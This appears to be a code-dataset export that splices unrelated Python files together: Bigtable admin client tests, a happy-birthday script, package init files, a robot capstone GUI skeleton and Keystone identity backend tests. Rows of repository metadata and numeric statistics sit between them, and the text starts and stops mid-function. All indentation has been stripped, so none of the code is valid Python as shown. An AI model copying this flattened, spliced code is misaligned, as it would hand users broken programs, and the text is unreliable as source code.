table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableFromSnapshotRequest(
parent=parent, table_id=table_id, source_snapshot=source_snapshot)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_from_snapshot_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
source_snapshot = 'sourceSnapshot-947679896'
response = client.create_table_from_snapshot(parent, table_id,
source_snapshot)
exception = response.exception()
assert exception.errors[0] == error
def test_list_tables(self):
# Setup Expected Response
next_page_token = ''
tables_element = {}
tables = [tables_element]
expected_response = {
'next_page_token': next_page_token,
'tables': tables
}
expected_response = bigtable_table_admin_pb2.ListTablesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.tables[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListTablesRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_tables_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
paged_list_response = client.list_tables(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_get_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.get_table(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetTableRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.get_table(name)
def test_delete_table(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.delete_table(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteTableRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.delete_table(name)
def test_modify_column_families(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
response = client.modify_column_families(name, modifications)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ModifyColumnFamiliesRequest(
name=name, modifications=modifications)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_modify_column_families_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
modifications = []
with pytest.raises(CustomException):
client.modify_column_families(name, modifications)
def test_drop_row_range(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
client.drop_row_range(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DropRowRangeRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_drop_row_range_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.drop_row_range(name)
def test_generate_consistency_token(self):
# Setup Expected Response
consistency_token = 'consistencyToken-1090516718'
expected_response = {'consistency_token': consistency_token}
expected_response = bigtable_table_admin_pb2.GenerateConsistencyTokenResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
response = client.generate_consistency_token(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GenerateConsistencyTokenRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_generate_consistency_token_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.generate_consistency_token(name)
def test_check_consistency(self):
# Setup Expected Response
consistent = True
expected_response = {'consistent': consistent}
expected_response = bigtable_table_admin_pb2.CheckConsistencyResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-1090516718'
response = client.check_consistency(name, consistency_token)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CheckConsistencyRequest(
name=name, consistency_token=consistency_token)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_check_consistency_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-1090516718'
with pytest.raises(CustomException):
client.check_consistency(name, consistency_token)
def test_snapshot_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description_2 = 'description2568623279'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description_2
}
expected_response = table_pb2.Snapshot(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_snapshot_table', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.SnapshotTableRequest(
name=name,
cluster=cluster,
snapshot_id=snapshot_id,
description=description)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_snapshot_table_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_snapshot_table_exception', done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
exception = response.exception()
assert exception.errors[0] == error
def test_get_snapshot(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description = 'description-1724546052'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description
}
expected_response = table_pb2.Snapshot(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
response = client.get_snapshot(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.get_snapshot(name)
def test_list_snapshots(self):
# Setup Expected Response
next_page_token = ''
snapshots_element = {}
snapshots = [snapshots_element]
expected_response = {
'next_page_token': next_page_token,
'snapshots': snapshots
}
expected_response = bigtable_table_admin_pb2.ListSnapshotsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.snapshots[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListSnapshotsRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_snapshots_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_snapshot(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
client.delete_snapshot(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.delete_snapshot(name)
| 37.016158 | 86 | 0.661606 | 2,030 | 20,618 | 6.478818 | 0.100493 | 0.072993 | 0.033075 | 0.041515 | 0.815465 | 0.791439 | 0.755398 | 0.739431 | 0.733196 | 0.718066 | 0 | 0.023625 | 0.248618 | 20,618 | 556 | 87 | 37.082734 | 0.825329 | 0.084732 | 0 | 0.671309 | 0 | 0 | 0.076661 | 0.02023 | 0 | 0 | 0 | 0 | 0.111421 | 1 | 0.083565 | false | 0.002786 | 0.019499 | 0.002786 | 0.119777 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be745972cf4b0503114981c8e000fb317f6ddd32 | 203 | py | Python | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | Python/Games/happy_birthday.py | erikhayton/Portfolio | ee1e649fe6340911968f27207ad7253d3ddc2cde | [
"MIT"
] | null | null | null | name = input("What is your name? ")
def happy_birthday():
print("Happy Birthday To You")
print("Happy Birthday To You")
print("Happy Birthday Dear" + name)
print("Happy Birthday To You") | 29 | 39 | 0.665025 | 29 | 203 | 4.62069 | 0.413793 | 0.485075 | 0.537313 | 0.447761 | 0.649254 | 0.477612 | 0.477612 | 0.477612 | 0 | 0 | 0 | 0 | 0.206897 | 203 | 7 | 40 | 29 | 0.832298 | 0 | 0 | 0.5 | 0 | 0 | 0.495098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.166667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
be82bc6e5854a64c8783138ea6de5f5cd1b9bcd9 | 138 | py | Python | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | 1 | 2021-01-30T15:38:32.000Z | 2021-01-30T15:38:32.000Z | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | src/wildfires/dask_cx1/__init__.py | akuhnregnier/wildfires | 4d31cbdd4a1303ecebc391a35c73b8f07d8fe400 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Modules to ease Dask usage on CX1."""
from .dask_cx1 import *
from .dask_rf import *
from .dask_utils import *
| 23 | 40 | 0.666667 | 22 | 138 | 4.045455 | 0.636364 | 0.269663 | 0.314607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 0.173913 | 138 | 5 | 41 | 27.6 | 0.754386 | 0.413043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
be9383b609ee77cf3c55f2d608460b54f2bd95fa | 124 | py | Python | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | notecron/center/common/scheduler/__init__.py | notechats/notejob | bf12c80a08761b97cb9405afa0706ccbb413eee0 | [
"MulanPSL-1.0"
] | null | null | null | """
scheduler
"""
from .CuBackgroundScheduler import CuBackgroundScheduler
from .CuGeventScheduler import CuGeventScheduler
| 20.666667 | 56 | 0.846774 | 9 | 124 | 11.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08871 | 124 | 5 | 57 | 24.8 | 0.929204 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fe4f6760f8abac870cab54d103307c1953a13c3d | 2,401 | py | Python | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | src/m2_run_this_on_laptop.py | tanzichen0403/99-CapstoneProject-201920 | 3183f502cd2689dd0ef68da1d4ef0a495a90c51c | [
"MIT"
] | null | null | null | """
Capstone Project. Code to run on a LAPTOP (NOT the robot).
Displays the Graphical User Interface (GUI) and communicates with the robot.
Authors: Your professors (for the framework)
and Xinlai Chen.
Winter term, 2018-2019.
"""
import mqtt_remote_method_calls as com
import tkinter
from tkinter import ttk
import shared_gui
def main():
"""
This code, which must run on a LAPTOP:
1. Constructs a GUI for my part of the Capstone Project.
2. Communicates via MQTT with the code that runs on the EV3 robot.
"""
# -------------------------------------------------------------------------
# Construct and connect the MQTT Client:
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# The root TK object for the GUI:
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# The main frame, upon which the other frames are placed.
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Sub-frames for the shared GUI that the team developed:
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Frames that are particular to my individual contributions to the project.
# -------------------------------------------------------------------------
# TODO: Implement and call get_my_frames(...)
# -------------------------------------------------------------------------
# Grid the frames.
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# The event loop:
# -------------------------------------------------------------------------
def get_shared_frames(main_frame, mqtt_sender):
pass
def grid_frames(teleop_frame, arm_frame, control_frame):
pass
# -----------------------------------------------------------------------------
# Calls main to start the ball rolling.
# -----------------------------------------------------------------------------
main() | 34.797101 | 79 | 0.326947 | 169 | 2,401 | 4.56213 | 0.526627 | 0.023346 | 0.015564 | 0.031128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005371 | 0.147022 | 2,401 | 69 | 80 | 34.797101 | 0.371094 | 0.81591 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.3 | false | 0.2 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
fea52b8e84af7a5a3792a1336dce60d413b6c77a | 110,398 | py | Python | tests/test_backend.py | isabella232/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 6 | 2016-08-06T09:00:17.000Z | 2021-10-21T23:12:47.000Z | tests/test_backend.py | paypal/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 1 | 2021-02-23T10:29:49.000Z | 2021-02-23T10:29:49.000Z | tests/test_backend.py | isabella232/keystone | 89d35004411e1eec9b1af97f589f06ae871aca02 | [
"Apache-2.0"
] | 10 | 2016-04-25T20:10:06.000Z | 2021-06-10T15:14:19.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import default_fixtures
import uuid
import nose.exc
from keystone.catalog import core
from keystone import config
from keystone import exception
from keystone.openstack.common import timeutils
from keystone import test
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
class IdentityTests(object):
def test_project_add_and_remove_user_role(self):
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertNotIn(self.user_two['id'], [x['id'] for x in user_refs])
self.identity_api.add_role_to_user_and_project(
tenant_id=self.tenant_bar['id'],
user_id=self.user_two['id'],
role_id=self.role_other['id'])
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertIn(self.user_two['id'], [x['id'] for x in user_refs])
self.identity_api.remove_role_from_user_and_project(
tenant_id=self.tenant_bar['id'],
user_id=self.user_two['id'],
role_id=self.role_other['id'])
user_refs = self.identity_api.get_project_users(self.tenant_bar['id'])
self.assertNotIn(self.user_two['id'], [x['id'] for x in user_refs])
def test_authenticate_bad_user(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'],
password=self.user_foo['password'])
def test_authenticate_bad_password(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'],
password=uuid.uuid4().hex)
def test_authenticate_bad_project(self):
self.assertRaises(AssertionError,
self.identity_api.authenticate,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex,
password=self.user_foo['password'])
def test_authenticate_no_project(self):
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_foo['id'],
password=self.user_foo['password'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
self.assert_(tenant_ref is None)
self.assert_(not metadata_ref)
def test_authenticate(self):
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_sna['id'],
tenant_id=self.tenant_bar['id'],
password=self.user_sna['password'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_sna.pop('password')
self.user_sna['enabled'] = True
self.assertDictEqual(user_ref, self.user_sna)
self.assertDictEqual(tenant_ref, self.tenant_bar)
metadata_ref.pop('roles')
self.assertDictEqual(metadata_ref, self.metadata_snamtu)
def test_authenticate_role_return(self):
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_baz['id'], self.role_admin['id'])
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=self.user_foo['id'],
tenant_id=self.tenant_baz['id'],
password=self.user_foo['password'])
self.assertIn('roles', metadata_ref)
self.assertIn(self.role_admin['id'], metadata_ref['roles'])
def test_authenticate_no_metadata(self):
user = {
'id': 'no_meta',
'name': 'NO_META',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'no_meta2',
}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_user_to_project(self.tenant_baz['id'],
user['id'])
user_ref, tenant_ref, metadata_ref = self.identity_api.authenticate(
user_id=user['id'],
tenant_id=self.tenant_baz['id'],
password=user['password'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
user.pop('password')
self.assertEquals(metadata_ref, {"roles":
[CONF.member_role_id]})
self.assertDictContainsSubset(user_ref, user)
self.assertDictEqual(tenant_ref, self.tenant_baz)
def test_password_hashed(self):
user_ref = self.identity_api._get_user(self.user_foo['id'])
self.assertNotEqual(user_ref['password'], self.user_foo['password'])
def test_get_project(self):
tenant_ref = self.identity_api.get_project(
tenant_id=self.tenant_bar['id'])
self.assertDictEqual(tenant_ref, self.tenant_bar)
def test_get_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
tenant_id=uuid.uuid4().hex)
def test_get_project_by_name(self):
tenant_ref = self.identity_api.get_project_by_name(
tenant_name=self.tenant_bar['name'],
domain_id=DEFAULT_DOMAIN_ID)
self.assertDictEqual(tenant_ref, self.tenant_bar)
def test_get_project_by_name_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project_by_name,
tenant_name=uuid.uuid4().hex,
domain_id=DEFAULT_DOMAIN_ID)
def test_get_project_users(self):
tenant_ref = self.identity_api.get_project_users(self.tenant_baz['id'])
user_ids = []
for user in tenant_ref:
self.assertNotIn('password', user)
user_ids.append(user.get('id'))
self.assertEquals(len(user_ids), 2)
self.assertIn(self.user_two['id'], user_ids)
self.assertIn(self.user_badguy['id'], user_ids)
def test_get_project_users_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project_users,
tenant_id=uuid.uuid4().hex)
def test_get_user(self):
user_ref = self.identity_api.get_user(user_id=self.user_foo['id'])
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
def test_get_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
user_id=uuid.uuid4().hex)
def test_get_user_by_name(self):
user_ref = self.identity_api.get_user_by_name(
user_name=self.user_foo['name'],
domain_id=DEFAULT_DOMAIN_ID)
# NOTE(termie): the password field is left in user_foo to make
# it easier to authenticate in tests, but should
# not be returned by the api
self.user_foo.pop('password')
self.assertDictEqual(user_ref, self.user_foo)
def test_get_user_by_name_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user_by_name,
user_name=uuid.uuid4().hex,
domain_id=DEFAULT_DOMAIN_ID)
def test_get_metadata(self):
metadata_ref = self.identity_api.get_metadata(
user_id=self.user_sna['id'],
tenant_id=self.tenant_bar['id'])
metadata_ref.pop('roles')
self.assertDictEqual(metadata_ref, self.metadata_snamtu)
def test_get_metadata_404(self):
# FIXME(dolph): these exceptions could be more specific
self.assertRaises(exception.NotFound,
self.identity_api.get_metadata,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'])
self.assertRaises(exception.NotFound,
self.identity_api.get_metadata,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_get_role(self):
role_ref = self.identity_api.get_role(
role_id=self.role_admin['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, self.role_admin)
def test_get_role_404(self):
self.assertRaises(exception.RoleNotFound,
self.identity_api.get_role,
role_id=uuid.uuid4().hex)
def test_create_duplicate_role_name_fails(self):
role = {'id': 'fake1',
'name': 'fake1name'}
self.identity_api.create_role('fake1', role)
role['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_api.create_role,
'fake2',
role)
def test_rename_duplicate_role_name_fails(self):
role1 = {
'id': 'fake1',
'name': 'fake1name'
}
role2 = {
'id': 'fake2',
'name': 'fake2name'
}
self.identity_api.create_role('fake1', role1)
self.identity_api.create_role('fake2', role2)
role1['name'] = 'fake2name'
self.assertRaises(exception.Conflict,
self.identity_api.update_role,
'fake1',
role1)
def test_create_duplicate_user_id_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_duplicate_user_name_fails(self):
user = {'id': 'fake1',
'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID,
'password': 'fakepass',
'tenants': ['bar']}
self.identity_man.create_user({}, 'fake1', user)
user['id'] = 'fake2'
self.assertRaises(exception.Conflict,
self.identity_man.create_user, {},
'fake2',
user)
def test_create_duplicate_user_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
user1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
user2 = {'id': uuid.uuid4().hex,
'name': user1['name'],
'domain_id': new_domain['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user1['id'], user1)
self.identity_man.create_user({}, user2['id'], user2)
def test_move_user_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user['id'], user)
user['domain_id'] = domain2['id']
self.identity_api.update_user(user['id'], user)
def test_move_user_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a user in domain1
user1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user1['id'], user1)
# Now create a user in domain2 with a potentially clashing
# name - which should work since we have domain separation
user2 = {'id': uuid.uuid4().hex,
'name': user1['name'],
'domain_id': domain2['id'],
'password': uuid.uuid4().hex}
self.identity_man.create_user({}, user2['id'], user2)
# Now try and move user1 into the 2nd domain - which should
# fail since the names clash
user1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
